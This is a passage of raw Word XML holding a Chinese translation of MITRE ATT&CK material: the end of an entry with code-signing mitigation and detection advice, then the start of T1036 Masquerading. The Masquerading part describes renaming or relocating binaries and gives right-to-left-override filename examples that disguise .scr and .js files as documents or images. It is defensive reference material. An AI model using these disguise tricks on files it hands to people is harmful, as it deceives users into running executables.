              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2F42C2D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C412B2" w14:paraId="1B9C9AC2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D085C9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D572A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对所有应用程序上的签名代码强制实施有效的数字签名，并且仅信任具有来自受信任方签名的应用程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61E9C463" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602007D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定二进制文件的原始入口点很困难，但校验和和签名验证是非常可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到确定</w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的。修改</w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_MAIN </w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点或添加其他</w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_MAIN </w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点会使文件的签名无效，并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且该行为会被</w:t>
      </w:r>
      <w:r w:rsidRPr="002250C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到。收集正在运行的进程信息，并针对已知应用程序进行比较，以查找可疑行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D9C94D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090C7507" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="41572C27" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF25028" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1036</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F9D45E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7254D8B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0AB1A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014E5779" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件名</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>或路径白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="357E5D7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Nick Carr</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>FireEye</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>David Lu</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Felipe Espósito</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@Pr0teus</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>ENDGAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Bartosz Jerzman</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD4E4B7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4845AEAE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344B333C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装指的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是攻击者操纵或滥用可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行文件（不管</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合法还是恶意的）的名称或位置来逃避防御和观察。已经发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>了以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几种技术变体：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F95F76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种变体是将可执行文件放在通常受信任的目录中，或者将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名为合法受信任程序的名称。另外</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>将文件命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>合法程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很相近</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的名称，或其它无伤大雅的名称。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>并重命名一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公共系统实用工具或程序来规避其对其使用情况的检测。这样做是为了绕过依赖文件名或路径来信任可执行文件的工具，以及通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>将文件名与其它合法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事物相</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>关联来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗防御程序和系统管理员认为文件是善意的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D00377" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="5721BEA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外一种变体使用从右向左覆盖（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）字符（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>U+202E</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诱骗用户执行他们认为的善意文件类型但实际上是可执行代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是非打印字符，它会导致后面的文本反向显示。例如，一个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>March 25 \u202Excod.scr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕保护程序文件将显示为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>March 25 rcs.docx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>photo_high_re\u202Egnp.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件将显示为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>photo_high_resj.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这种技术的一个常见做法是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络钓鱼攻击附件，因为它可以欺骗邮件双方和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>防御程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恰好他们不知道自己</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具如何显示和呈现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符。在许多针对性的入侵企图和犯罪活动中都可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符的使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示相反的字符，但命令行工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下不这么显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BDF04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC767D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这种技术的另一种变体中，攻击者可能会使用合法实用程序的重命名副本，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。另一种情况是，将合法实用程序移动到其他目录并重命名来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>规避</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从非标准路径执行的系统实用程序的检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE725E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受信任位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会把恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>二进制文件命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受信任二进制名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”和“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4F7DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5ABEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此技术的另一个变体包括恶意二进制文件启动后（与以前相反）将运行进程的名称更改为可信或良性进程的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561B0B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
